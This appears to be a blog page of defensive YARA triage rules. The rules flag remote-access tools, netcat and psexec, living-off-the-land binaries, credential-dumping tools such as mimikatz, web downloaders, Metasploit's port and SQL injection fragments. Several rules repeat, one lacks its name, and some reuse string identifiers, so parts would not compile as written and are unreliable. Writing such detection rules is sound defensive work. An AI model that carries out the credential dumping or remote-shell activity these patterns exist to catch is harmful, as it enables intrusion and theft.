$string120 = "Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko"
$string121 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0"
$string122 = "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/"
$string123 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
$string124 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
$string125 = "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0"
$string126 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2"
$string127 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0"
$string128 = "Mozilla/5.0 (Windows NT 9;"
$string129 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"
$string130 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1"
$string131 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)"
$string132 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)"
$string133 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
$string134 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200"
$string135 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7"
$string136 = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
$string137 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0"
$string138 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
$string139 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)"
$string140 = "Mozilla/5.0 WinInet"
$string142 = "Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)"
$string143 = "Netscape"
$string144 = "O/9.27 (W; U; Z)"
$string146 = "Opera/8.81 (Windows NT 6.0; U; en)"
$string147 = "RookIE/1.0"
$string148 = "SIPDROID"
$string149 = "SJZJ (compatible; MSIE 6.0; Win32)"
$string150 = "Sametime Community Agent"
$string151 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC"
$string152 = "Wget/1.9+cvs-stable (Red Hat modified)"
$string154 = "X-FORWARDED-FOR"
$string155 = "XMRig"
$string157 = "backdoorbot"
$string158 = "ccminer"
$string159 = "hots scot"
$string160 = "nocase"
$string161 = "nsis_inetc (mozilla)"
$string162 = "ruler"
$string163 = "sample"
$string164 = "user-agent"
condition:
1 of them
}
Labels:
Florian Roth,
Neo23x0,
Sigma,
UA,
User Agent,
UserAgent,
yara
Generic Triage Yara Rules
rule RemoteControlUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Cloud Remote Control Url Accessed"
strings:
$string0 = "teamviewer" nocase
$string1 = "splashtop" nocase
$string2 = "ammyy" nocase
$string3 = "mikogo" nocase
$string4 = "uvnc" nocase
$string5 = "gbchcmhmhahfdphkhkmpfmihenigjmpp" nocase
$string6 = "logmein" nocase
$string7 = "join.me" nocase
$string8 = "realvnc" nocase
$string9 = "dameware" nocase
$string10 = "dwservice" nocase
$string11 = "anydesk" nocase
condition:
1 of them
}
rule WebMailUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Web Mail Url Accessed"
strings:
$string0 = "mail.yahoo.com" nocase
$string1 = "@gmail.com" nocase
$string2 = "outlook.live.com" nocase
$string3 = "mail.protonmail.com" nocase
$string4 = "zoho.com" nocase
$string5 = "yandex.com" nocase
$string6 = "tutanota.com" nocase
$string7 = "kolbanow.com" nocase
$string8 = "fastmail.com" nocase
$string10 = "posteo.de" nocase
$string11 = "startmail.com" nocase
$string12 = "runbox.com" nocase
$string13 = "mailfence.com" nocase
$string14 = "countermail.com" nocase
condition:
1 of them
}
rule CloudFileStorageUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Cloud File Storage Url Accessed"
strings:
$string0 = "dropbox.com" nocase
$string1 = "drive.google.com" nocase
$string2 = "wetransfer.com" nocase
$string3 = "pcloud.com" nocase
$string4 = "tresorit.com" nocase
$string5 = "sync.com" nocase
$string6 = "onedrive.live.com" nocase
$string7 = ".box.com" nocase
$string8 = "spideroak.com" nocase
$string9 = "mega.nz" nocase
$string10 = "jottacloud.com" nocase
$string11 = "teamdrive.com" nocase
$string12 = "mediafire.com" nocase
$string13 = "cloudup.com" nocase
$string14 = "cloudme.com" nocase
condition:
1 of them
}
rule LateralMovementAttempt
{
meta:
author = "@neonprimetime"
description = "Lateral Movement Attempt"
strings:
$string0 = "mstsc" nocase
$string1 = "psexec" nocase
$string2 = "\\nc.exe" nocase
$string3 = "/nc.exe" nocase
$string2 = "\\nc64.exe" nocase
$string3 = "/nc64.exe" nocase
$string2 = "\\netcat.exe" nocase
$string3 = "/netcat.exe" nocase
$string4 = "putty.exe" nocase
$string5 = "mobax" nocase
$string6 = "securecrt" nocase
$string7 = "ssh.exe" nocase
$string8 = "winrs" nocase
condition:
1 of them
}
rule ShortExecutableName
{
meta:
author = "@neonprimetime"
description = "Short Executable Name"
strings:
$string0 = "/0.exe" nocase
$string1 = "/1.exe" nocase
$string2 = "/2.exe" nocase
$string3 = "/3.exe" nocase
$string4 = "/4.exe" nocase
$string5 = "/5.exe" nocase
$string6 = "/6.exe" nocase
$string7 = "/7.exe" nocase
$string8 = "/8.exe" nocase
$string9 = "/9.exe" nocase
$string10 = "\\0.exe" nocase
$string11 = "\\1.exe" nocase
$string12 = "\\2.exe" nocase
$string13 = "\\3.exe" nocase
$string14 = "\\4.exe" nocase
$string15 = "\\5.exe" nocase
$string16 = "\\6.exe" nocase
$string17 = "\\7.exe" nocase
$string18 = "\\8.exe" nocase
$string19 = "\\9.exe" nocase
$string20 = "/a.exe" nocase
$string21 = "/b.exe" nocase
$string22 = "/c.exe" nocase
$string23 = "/d.exe" nocase
$string24 = "/e.exe" nocase
$string25 = "/f.exe" nocase
$string26 = "/g.exe" nocase
$string27 = "/h.exe" nocase
$string28 = "/i.exe" nocase
$string29 = "/j.exe" nocase
$string30 = "/k.exe" nocase
$string31 = "/l.exe" nocase
$string32 = "/m.exe" nocase
$string33 = "/n.exe" nocase
$string34 = "/o.exe" nocase
$string35 = "/p.exe" nocase
$string36 = "/q.exe" nocase
$string37 = "/r.exe" nocase
$string38 = "/s.exe" nocase
$string39 = "/t.exe" nocase
$string40 = "/u.exe" nocase
$string41 = "/v.exe" nocase
$string42 = "/w.exe" nocase
$string43 = "/x.exe" nocase
$string44 = "/y.exe" nocase
$string45 = "/z.exe" nocase
$string46 = "\\a.exe" nocase
$string47 = "\\b.exe" nocase
$string48 = "\\c.exe" nocase
$string49 = "\\d.exe" nocase
$string50 = "\\e.exe" nocase
$string51 = "\\f.exe" nocase
$string52 = "\\g.exe" nocase
$string53 = "\\h.exe" nocase
$string54 = "\\i.exe" nocase
$string55 = "\\j.exe" nocase
$string56 = "\\k.exe" nocase
$string57 = "\\l.exe" nocase
$string58 = "\\m.exe" nocase
$string59 = "\\n.exe" nocase
$string60 = "\\o.exe" nocase
$string61 = "\\p.exe" nocase
$string62 = "\\q.exe" nocase
$string63 = "\\r.exe" nocase
$string64 = "\\s.exe" nocase
$string65 = "\\t.exe" nocase
$string66 = "\\u.exe" nocase
$string67 = "\\v.exe" nocase
$string68 = "\\w.exe" nocase
$string69 = "\\x.exe" nocase
$string70 = "\\y.exe" nocase
$string71 = "\\z.exe" nocase
condition:
1 of them
}
rule PolicyViolation
{
meta:
author = "@neonprimetime"
description = "Policy Violation"
strings:
$string0 = "disableuac" nocase
condition:
1 of them
}
rule LivingOffLandCommand
{
meta:
author = "@neonprimetime"
description = "Living Off the Land Command"
strings:
$string0 = "mshta.exe" nocase
$string1 = "nbstat.exe" nocase
$string5 = "/query.exe" nocase
$string6 = "\\query.exe" nocase
$string8 = "bitsadmin.exe" nocase
$string9 = "curl.exe" nocase
$string10 = "wget.exe" nocase
$string11 = "systeminfo.exe" nocase
$string12 = "certutil.exe" nocase
condition:
1 of them
}
rule PhishingAttachmentThemePossible
{
meta:
author = "@neonprimetime"
description = "Phishing Attachment Theme Possible"
strings:
$string0a = "invoice." nocase
$string0b = "invoice " nocase
$string1 = "factura" nocase
$string2 = "wiretransfer" nocase
$string4a = "payment" nocase
$string4b = "payment." nocase
$string6a = "eFAX " nocase
$string6b = "eFAX." nocase
$string7 = "Fattura" nocase
$string8 = "Enquiry" nocase
$string9 = "QUOTATION" nocase
$string10 = "receipt " nocase
$string10 = "receipt." nocase
$string11a = "payroll." nocase
$string11b = "payroll " nocase
$string12 = "PO#" nocase
$string13 = "Proforma" nocase
$string14 = "Purchase." nocase
$string14 = "Purchase " nocase
$string14 = "PurchaseOrder" nocase
condition:
1 of them
}
rule ClearTextPasswordFile
{
meta:
author = "@neonprimetime"
description = "Clear Text Password File"
strings:
$string0 = "password.txt" nocase
$string1 = "pwd.txt" nocase
$string2 = "passwd.txt" nocase
$string3 = "password.doc" nocase
$string4 = "pwd.doc" nocase
$string5 = "passwd.doc" nocase
$string6 = "password.xls" nocase
$string7 = "pwd.xls" nocase
$string8 = "passwd.xls" nocase
$string9 = "passwords.txt" nocase
$string10 = "pwds.txt" nocase
$string11 = "passwds.txt" nocase
$string12 = "passwords.doc" nocase
$string13 = "pwds.doc" nocase
$string14 = "passwds.doc" nocase
$string15 = "passwords.xls" nocase
$string16 = "pwds.xls" nocase
$string17 = "passwds.xls" nocase
$string18 = "web.config" nocase
$string19 = "application.config" nocase
condition:
1 of them
}
rule AdminUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Admin Web Pages"
strings:
$string0 = "/admin/" nocase
$string1 = "/wp-admin/" nocase
condition:
1 of them
}
rule HackingToolFound
{
meta:
author = "@neonprimetime"
description = "Hacking Tool Found"
strings:
$string0 = "kali.exe" nocase
$string2 = "wireshark" nocase
$string3 = "bloodhound" nocase
$string4 = "obfuscation" nocase
$string5 = "shellcode" nocase
$string6 = "keylogger" nocase
$string7 = "bypassuac" nocase
$string8 = "tokenmanipulation" nocase
$string10 = "passhash" nocase
$string11 = "kerberoast" nocase
$string12 = "ninja" nocase
$string13 = "memorynps" nocase
$string14 = "metasploit" nocase
$string15 = "smbexec" nocase
$string16 = "gpppassword" nocase
$string17 = "arpscan" nocase
$string18 = "dnscat" nocase
$string19 = "aircrack" nocase
$string20 = "bulletspassview" nocase
$string21 = "chromepass" nocase
$string22 = "credentialsfileview" nocase
$string23 = "echo.exe" nocase
$string24 = "hydra.exe" nocase
$string25 = "iepv.exe" nocase
$string26 = "inssidersetup" nocase
$string28 = "mailpv.exe" nocase
$string29 = "ministumblersetup" nocase
$string33 = "netpass.exe" nocase
$string34 = "netstumbler" nocase
$string35 = "nltest.exe" nocase
$string36 = "ophcrack" nocase
$string37 = "rdpv.exe" nocase
$string38 = "setspn" nocase
$string39 = "sniffpass" nocase
$string40 = "vaultpasswordview" nocase
$string41 = "\\ver.exe" nocase
$string42 = "vncpassview" nocase
$string43 = "webbrowserpassview" nocase
condition:
1 of them
}
rule HackingCodeFound
{
meta:
author = "@neonprimetime"
description = "Hacking Code Found"
strings:
$string0 = "WriteProcessMemory" nocase
$string1 = "VirtualAlloc" nocase
$string2 = "SetWindowsHook" nocase
$string3 = "SHCreateThread" nocase
$string4 = "FromBase64String" nocase
$string5 = "PromptForCredential" nocase
$string6 = "AdjustTokenPrivileges" nocase
$string7 = "KerberosRequestorSecurityToken" nocase
$string8 = "UnsafeNativeMethods" nocase
$string9 = "ReadProcessMemoryMiniDumpWriteDump" nocase
$string10 = "TOKEN_ADJUST_PRIVILEGES" nocase
$string11 = "TOKEN_IMPERSONATE" nocase
$string12 = "TOKEN_ELEVATION" nocase
$string13 = "TOKEN_ALL_ACCESS" nocase
condition:
1 of them
}
rule PasswordDumpAttempt
{
meta:
author = "@neonprimetime"
description = "Password Dump Temp"
strings:
$string0 = "mimikatz" nocase
$string1 = "procdump" nocase
$string3 = "hashdump" nocase
$string4 = "pwdump" nocase
$string5 = "lsadump" nocase
condition:
1 of them
}
rule ExternalDriveAccessed
{
meta:
author = "@neonprimetime"
description = "External Drive Accessed"
strings:
$string4 = "file:///f:/" nocase
$string6 = "file:///g:/" nocase
$string8 = "mfeprom" nocase
condition:
1 of them
}
rule HackerOutputFile
{
meta:
author = "@neonprimetime"
description = "Hacker Output Files"
strings:
$string0 = "acls.csv" nocase
$string1 = "bloodhound.csv" nocase
$string2 = "dump.csv" nocase
$string3 = "dump.xml" nocase
$string4 = "dump.zip" nocase
$string5 = "firewall.txt" nocase
$string6 = "group_memberships.csv" nocase
$string7 = "hashdump.txt" nocase
$string8 = "local_admins.csv" nocase
$string9 = "lsadump.txt" nocase
$string10 = "lsass.dmp" nocase
$string11 = "lsassdump.dmp" nocase
$string12 = "mimikatz.xls" nocase
$string13 = "mini.dmp" nocase
$string14 = "netscan.xml" nocase
$string15 = "nmap.csv" nocase
$string16 = "nmap.txt" nocase
$string17 = "nmap.xml" nocase
$string18 = "openvas.csv" nocase
$string19 = "pwdump.txt" nocase
$string20 = "secretsdump.txt" nocase
$string21 = "targets.txt" nocase
$string22 = "trusts.csv" nocase
$string23 = "user_sessions.csv" nocase
$string24 = "bloodhound.bin" nocase
$string25 = ".gnmap" nocase
$string26 = ".nessus" nocase
$string27 = ".nmap" nocase
$string28 = "p0wn" nocase
condition:
1 of them
}
rule HackerUrl
{
meta:
author = "@neonprimetime"
description = "Hacker Url"
strings:
$string1 = "kali." nocase
$string2 = "/kali/" nocase
$string3 = "kali-" nocase
$string4 = "backbox." nocase
$string5 = "/backbox/" nocase
$string6 = "backbox-" nocase
$string7 = "blackarch." nocase
$string8 = "/blackarch/" nocase
$string9 = "blackarch-" nocase
$string10 = "caine-live." nocase
$string11 = "/caine-live/" nocase
$string12 = "caine-live-" nocase
$string13 = "deftlinux." nocase
$string14 = "/deftlinux/" nocase
$string15 = "deftlinux-" nocase
$string16 = "parrotsec." nocase
$string17 = "/parrotsec/" nocase
$string18 = "parrotsec-" nocase
$string19 = "altlinux./altlinux/" nocase
$string20 = "altlinux-" nocase
$string21 = "digi77." nocase
$string22 = "/digi77/" nocase
$string23 = "digi77-" nocase
$string24 = ".paterva." nocase
$string25 = "portswigger." nocase
$string26 = "exploit-db." nocase
$string27 = "/exploit-db/" nocase
$string28 = "exploit-db-" nocase
$string29 = "parrot.sh" nocase
$string30 = "/parrot.sh/" nocase
$string31 = "basealt.ru" nocase
$string32 = "/basealt.ru/" nocase
$string33 = "basealt.ru-" nocase
$string34 = "0day.today" nocase
$string35 = "/0day.today/" nocase
$string36 = "0day.today-archstrike." nocase
$string37 = "/archstrike/" nocase
$string38 = "archstrike-" nocase
condition:
1 of them
}
rule PUPSoftware
{
meta:
author = "@neonprimetime"
description = "Potentially Unwanted Software"
strings:
$string0 = "adusetup" nocase
$string1 = "advanced driver" nocase
$string2 = "anytimeastrology" nocase
$string3 = "aplusgamer" nocase
$string4 = "apnsetup" nocase
$string5 = "apnstub" nocase
$string6 = "ascsetup" nocase
$string7 = "astromenda" nocase
$string8 = "atozmanuals" nocase
$string9 = "atwrun" nocase
$string10 = "audiotoaudio" nocase
$string11 = "bringmesports" nocase
$string12 = "bytefence" nocase
$string13 = "calendarspark" nocase
$string14 = "ccleaner" nocase
$string15 = "citysearch" nocase
$string16 = "convertpdfsnowtooltab" nocase
$string17 = "coupon companion" nocase
$string18 = "couponscom" nocase
$string19 = "cursormania" nocase
$string20 = "dailybibleguide" nocase
$string21 = "dailyrecipeguidetooltab" nocase
$string22 = "dailywellnessguide" nocase
$string23 = "dictionaryboss" nocase
$string24 = "directionsandmap" nocase
$string25 = "discoverancestry" nocase
$string26 = "discoverliveradio" nocase
$string27 = "disk-defrag-setup" nocase
$string28 = "downspeedtest" nocase
$string29 = "driver-updater-setup" nocase
$string30 = "driver.talent" nocase
$string31 = "driverassist-setup" nocase
$string32 = "driverdoc" nocase
$string33 = "drivereasy" nocase
$string34 = "driverrestore" nocase
$string35 = "driversupport" nocase
$string36 = "drivertalent" nocase
$string37 = "drivertoolkit" nocase
$string38 = "driverupdate-" nocase
$string39 = "driverupdate-downloader" nocase
$string40 = "driverupdate-setup" nocase
$string41 = "driverwhiz" nocase
$string42 = "easeware" nocase
$string43 = "easydriverpro" nocase
$string44 = "easyhomedecorating" nocase
$string45 = "easypdfcombine" nocase
$string46 = "easyphotoedit" nocase
$string47 = "eliteunzip" nocase
$string48 = "emailaccessonline" nocase
$string49 = "everyday lookup" nocase
$string50 = "everydaylookup" nocase
$string51 = "filefanatic" nocase
$string52 = "filesharefanatic" nocase
$string53 = "flashplayerpro" nocase
$string54 = "flightsearchapp" nocase
$string55 = "freemakevideoconvertersetup" nocase
$string56 = "freemanuals" nocase
$string57 = "freeradiocast" nocase
$string58 = "fromdoctopdftooltab" nocase
$string59 = "funcustomcreations" nocase
$string60 = "gamingassassin" nocase
$string61 = "gamingwonderland" nocase
$string62 = "garden enthusiast" nocase
$string63 = "gardeningenthusiast" nocase
$string64 = "getflightinfo" nocase
$string65 = "getformsonline" nocase
$string66 = "gettvstreamnow" nocase
$string67 = "gifables" nocase
$string68 = "happinessinfusion" nocase
$string69 = "headlinealley" nocase
$string70 = "howtosimplified" nocase
$string71 = "howtosuite" nocase
$string72 = "inboxace" nocase
$string73 = "internetspeedtracker" nocase
$string74 = "knowthebible" nocase
$string75 = "localcrimewatcher" nocase
$string76 = "mapsgalaxy" nocase
$string77 = "marineaquariumlite" nocase
$string78 = "mergedocsonline" nocase
$string79 = "mydailyrunway" nocase
$string80 = "myeasylotto" nocase
$string81 = "myformsfinder" nocase
$string82 = "myfuncards" nocase
$string83 = "mynewsguide" nocase
$string84 = "mypcbackup" nocase
$string85 = "myradioplayer" nocase
$string86 = "myscrapnook" nocase
$string87 = "mysocialshortcut" nocase
$string88 = "mytelevisionhq" nocase
$string89 = "mytransitguide" nocase
$string90 = "myweatherradar" nocase
$string91 = "mywebface" nocase
$string92 = "notehomepage" nocase
$string93 = "onlinemapfinder" nocase
$string94 = "openfreely" nocase
$string95 = "packagetracer" nocase
$string96 = "pckeeper" nocase
$string97 = "pdfconverterhq" nocase
$string98 = "photofriendzy" nocase
$string99 = "playpoptrivia" nocase
$string100 = "playthruplayer" nocase
$string101 = "popularscreensavers" nocase
$string102 = "ppc-software" nocase
$string103 = "premierdownloadmanager" nocase
$string104 = "procleaningsoftware" nocase
$string105 = "productivityboss" nocase
$string106 = "productmanualsfinder" nocase
$string107 = "propccleaner" nocase
$string108 = "puzzlegamesdaily" nocase
$string109 = "quotationcafe" nocase
$string110 = "qyuninst" nocase
$string111 = "radiorage" nocase
$string112 = "readingfanatic" nocase
$string113 = "registry-cleaner" nocase
$string114 = "regservo" nocase
$string115 = "removedt" nocase
$string116 = "safepcrepair" nocase
$string117 = "scenichomepage" nocase
$string118 = "searchbar" nocase
$string119 = "searchformsonline" nocase
$string120 = "searchpredict" nocase
$string121 = "slimcleanerplus" nocase
$string122 = "smsfrombrowser" nocase
$string123 = "snapmyscreen" nocase
$string124 = "soccerinferno" nocase
$string125 = "spyhunter" nocase
$string126 = "studyhq" nocase
$string127 = "sweepstakesalley" nocase
$string128 = "tbieaddin.dll" nocase
$string129 = "televisionfanatic" nocase
$string130 = "ticketxplorer" nocase
$string131 = "timewhackers" nocase
$string132 = "tooltabextension.dll" nocase
$string133 = "totalrecipesearch" nocase
$string134 = "trackapackage" nocase
$string135 = "translationbuddy" nocase
$string136 = "unifiedlogger.dll" nocase
$string137 = "utility chest" nocase
$string138 = "videodownloadconverter" nocase
$string139 = "votinstw" nocase
$string140 = "votprx" nocase
$string141 = "wb-setup" nocase
$string142 = "web_bar" nocase
$string143 = "webdiscover" nocase
$string144 = "webdiscoverbrowserdownloaderwebesc" nocase
$string145 = "webext_dl" nocase
$string146 = "winwb" nocase
$string147 = "yourtemplatefindertooltab" nocase
$string148 = "ysearchsettool" nocase
$string149 = "ysearchutilsvc" nocase
condition:
1 of them
}
rule ActiveDirectoryDomainFlag
{
meta:
author = "@neonprimetime"
description = "AD domain flag"
strings:
$string0 = " /domain " nocase
condition:
1 of them
}
rule ActiveDirectoryCreateFlag
{
meta:
author = "@neonprimetime"
description = "AD Create flag"
strings:
$string0 = " /add " nocase
$string1 = " /create " nocase
condition:
1 of them
}
rule MetasploitPort
{
meta:
author = "@neonprimetime"
description = "Metasploit Port"
strings:
$string0 = ":4444" nocase
condition:
1 of them
}
rule AdminFileShareAccess
{
meta:
author = "@neonprimetime"
description = "Admin File Share Access"
strings:
$string0 = "admin$" nocase
condition:
1 of them
}
rule TeamViewerPort
{
meta:
author = "@neonprimetime"
description = "TeamViewer Port"
strings:
$string0 = ":5938" nocase
condition:
1 of them
}
rule ActiveDirectoryCriticalGroup
{
meta:
author = "@neonprimetime"
description = "Critical AD groups"
strings:
$string0 = "domain admins" nocase
$string1 = "enterprise admins" nocase
$string2 = "schema admins" nocase
$string3 = "workstation admins" nocase
$string4 = "dns admins" nocase
$string5 = "server admins" nocase
condition:
1 of them
}
rule NewUser
{
meta:
author = "@neonprimetime"
description = "New User Commands"
strings:
$string0 = "new-localuser" nocase
$string1 = "new-aduser" nocase
condition:
1 of them
}
rule WebDownloader
{
meta:
author = "@neonprimetime"
description = "Web Downloader"
strings:
$string0 = "DownloadFile(" nocase
$string1 = "DownloadString" nocase
$string2 = "WebRequest" nocase
$string3 = "wget" nocase
$string4 = "bitstransfer" nocase
condition:
1 of them
}
rule McAfeeQuarantineFile
{
meta:
author = "@neonprimetime"
description = "McAfee Quarantine File"
strings:
$string0 = "\\quarantine\\" nocase
$string1 = ".bup" nocase
condition:
1 of them
}
rule VulnerabilityScanner
{
meta:
author = "@neonprimetime"
description = "Vulnerability Scanner"
strings:
$string0 = "AngryIP" nocase
$string1a = "\\Nmap " nocase
$string1b = "/Nmap." nocase
$string1c = " Nmap " nocase
$string1d = " Nmap." nocase
$string2 = "Nessus" nocase
$string3 = "sqlmap" nocase
$string4 = "nikto" nocase
$string5 = "wpscan" nocase
$string6 = "hyrda" nocase
$string7 = "dirbuster" nocase
$string8 = "masscan" nocase
$string9 = "morfeus" nocase
$string10 = "sqlninja" nocase
condition:
1 of them
}
rule SqlInjection
{
meta:
author = "@neonprimetime"
description = "Sql Injection"
strings:
$string0 = "UNION+ALL+SELECT" nocase
$string1 = ",NULL,NULL" nocase
$string2 = "AND+SLEEP" nocase
$string3 = "PG_SLEEP" nocase
$string4 = "WAITFOR+DELAY" nocase
$string5 = "CONCAT(0x" nocase
$string6 = "UNION+SELECT" nocase
$string7 = "--+" nocase
$string8 = "')UNION ALL SELECT" nocase
$string9 = ",NULL,NULL" nocase
$string10 = "AND SLEEP" nocase
$string11 = "WAITFOR DELAY" nocase
$string12 = "CONTACT(0x" nocase
$string13 = "UNION SELECT" nocase
$string14 = "UNION+ALL+SELECT" nocase
$string15 = "AND+SLEEP" nocase
$string16 = "WAITFOR+DELAY" nocase
$string17 = "UNION+SELECT)" nocase
condition:
1 of them
}
{
meta:
author = "@neonprimetime"
description = "Cloud Remote Control Url Accessed"
strings:
$string0 = "teamviewer" nocase
$string1 = "splashtop" nocase
$string2 = "ammyy" nocase
$string3 = "mikogo" nocase
$string4 = "uvnc" nocase
$string5 = "gbchcmhmhahfdphkhkmpfmihenigjmpp" nocase
$string6 = "logmein" nocase
$string7 = "join.me" nocase
$string8 = "realvnc" nocase
$string9 = "dameware" nocase
$string10 = "dwservice" nocase
$string11 = "anydesk" nocase
condition:
1 of them
}
rule WebMailUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Web Mail Url Accessed"
strings:
$string0 = "mail.yahoo.com" nocase
$string1 = "@gmail.com" nocase
$string2 = "outlook.live.com" nocase
$string3 = "mail.protonmail.com" nocase
$string4 = "zoho.com" nocase
$string5 = "yandex.com" nocase
$string6 = "tutanota.com" nocase
$string7 = "kolbanow.com" nocase
$string8 = "fastmail.com" nocase
$string10 = "posteo.de" nocase
$string11 = "startmail.com" nocase
$string12 = "runbox.com" nocase
$string13 = "mailfence.com" nocase
$string14 = "countermail.com" nocase
condition:
1 of them
}
rule CloudFileStorageUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Cloud File Storage Url Accessed"
strings:
$string0 = "dropbox.com" nocase
$string1 = "drive.google.com" nocase
$string2 = "wetransfer.com" nocase
$string3 = "pcloud.com" nocase
$string4 = "tresorit.com" nocase
$string5 = "sync.com" nocase
$string6 = "onedrive.live.com" nocase
$string7 = ".box.com" nocase
$string8 = "spideroak.com" nocase
$string9 = "mega.nz" nocase
$string10 = "jottacloud.com" nocase
$string11 = "teamdrive.com" nocase
$string12 = "mediafire.com" nocase
$string13 = "cloudup.com" nocase
$string14 = "cloudme.com" nocase
condition:
1 of them
}
rule LateralMovementAttempt
{
meta:
author = "@neonprimetime"
description = "Lateral Movement Attempt"
strings:
$string0 = "mstsc" nocase
$string1 = "psexec" nocase
$string2 = "\\nc.exe" nocase
$string3 = "/nc.exe" nocase
$string2 = "\\nc64.exe" nocase
$string3 = "/nc64.exe" nocase
$string2 = "\\netcat.exe" nocase
$string3 = "/netcat.exe" nocase
$string4 = "putty.exe" nocase
$string5 = "mobax" nocase
$string6 = "securecrt" nocase
$string7 = "ssh.exe" nocase
$string8 = "winrs" nocase
condition:
1 of them
}
rule ShortExecutableName
{
meta:
author = "@neonprimetime"
description = "Short Executable Name"
strings:
$string0 = "/0.exe" nocase
$string1 = "/1.exe" nocase
$string2 = "/2.exe" nocase
$string3 = "/3.exe" nocase
$string4 = "/4.exe" nocase
$string5 = "/5.exe" nocase
$string6 = "/6.exe" nocase
$string7 = "/7.exe" nocase
$string8 = "/8.exe" nocase
$string9 = "/9.exe" nocase
$string10 = "\\0.exe" nocase
$string11 = "\\1.exe" nocase
$string12 = "\\2.exe" nocase
$string13 = "\\3.exe" nocase
$string14 = "\\4.exe" nocase
$string15 = "\\5.exe" nocase
$string16 = "\\6.exe" nocase
$string17 = "\\7.exe" nocase
$string18 = "\\8.exe" nocase
$string19 = "\\9.exe" nocase
$string20 = "/a.exe" nocase
$string21 = "/b.exe" nocase
$string22 = "/c.exe" nocase
$string23 = "/d.exe" nocase
$string24 = "/e.exe" nocase
$string25 = "/f.exe" nocase
$string26 = "/g.exe" nocase
$string27 = "/h.exe" nocase
$string28 = "/i.exe" nocase
$string29 = "/j.exe" nocase
$string30 = "/k.exe" nocase
$string31 = "/l.exe" nocase
$string32 = "/m.exe" nocase
$string33 = "/n.exe" nocase
$string34 = "/o.exe" nocase
$string35 = "/p.exe" nocase
$string36 = "/q.exe" nocase
$string37 = "/r.exe" nocase
$string38 = "/s.exe" nocase
$string39 = "/t.exe" nocase
$string40 = "/u.exe" nocase
$string41 = "/v.exe" nocase
$string42 = "/w.exe" nocase
$string43 = "/x.exe" nocase
$string44 = "/y.exe" nocase
$string45 = "/z.exe" nocase
$string46 = "\\a.exe" nocase
$string47 = "\\b.exe" nocase
$string48 = "\\c.exe" nocase
$string49 = "\\d.exe" nocase
$string50 = "\\e.exe" nocase
$string51 = "\\f.exe" nocase
$string52 = "\\g.exe" nocase
$string53 = "\\h.exe" nocase
$string54 = "\\i.exe" nocase
$string55 = "\\j.exe" nocase
$string56 = "\\k.exe" nocase
$string57 = "\\l.exe" nocase
$string58 = "\\m.exe" nocase
$string59 = "\\n.exe" nocase
$string60 = "\\o.exe" nocase
$string61 = "\\p.exe" nocase
$string62 = "\\q.exe" nocase
$string63 = "\\r.exe" nocase
$string64 = "\\s.exe" nocase
$string65 = "\\t.exe" nocase
$string66 = "\\u.exe" nocase
$string67 = "\\v.exe" nocase
$string68 = "\\w.exe" nocase
$string69 = "\\x.exe" nocase
$string70 = "\\y.exe" nocase
$string71 = "\\z.exe" nocase
condition:
1 of them
}
rule PolicyViolation
{
meta:
author = "@neonprimetime"
description = "Policy Violation"
strings:
$string0 = "disableuac" nocase
condition:
1 of them
}
rule LivingOffLandCommand
{
meta:
author = "@neonprimetime"
description = "Living Off the Land Command"
strings:
$string0 = "mshta.exe" nocase
$string1 = "nbstat.exe" nocase
$string5 = "/query.exe" nocase
$string6 = "\\query.exe" nocase
$string8 = "bitsadmin.exe" nocase
$string9 = "curl.exe" nocase
$string10 = "wget.exe" nocase
$string11 = "systeminfo.exe" nocase
$string12 = "certutil.exe" nocase
condition:
1 of them
}
rule PhishingAttachmentThemePossible
{
meta:
author = "@neonprimetime"
description = "Phishing Attachment Theme Possible"
strings:
$string0a = "invoice." nocase
$string0b = "invoice " nocase
$string1 = "factura" nocase
$string2 = "wiretransfer" nocase
$string4a = "payment" nocase
$string4b = "payment." nocase
$string6a = "eFAX " nocase
$string6b = "eFAX." nocase
$string7 = "Fattura" nocase
$string8 = "Enquiry" nocase
$string9 = "QUOTATION" nocase
$string10 = "receipt " nocase
$string10 = "receipt." nocase
$string11a = "payroll." nocase
$string11b = "payroll " nocase
$string12 = "PO#" nocase
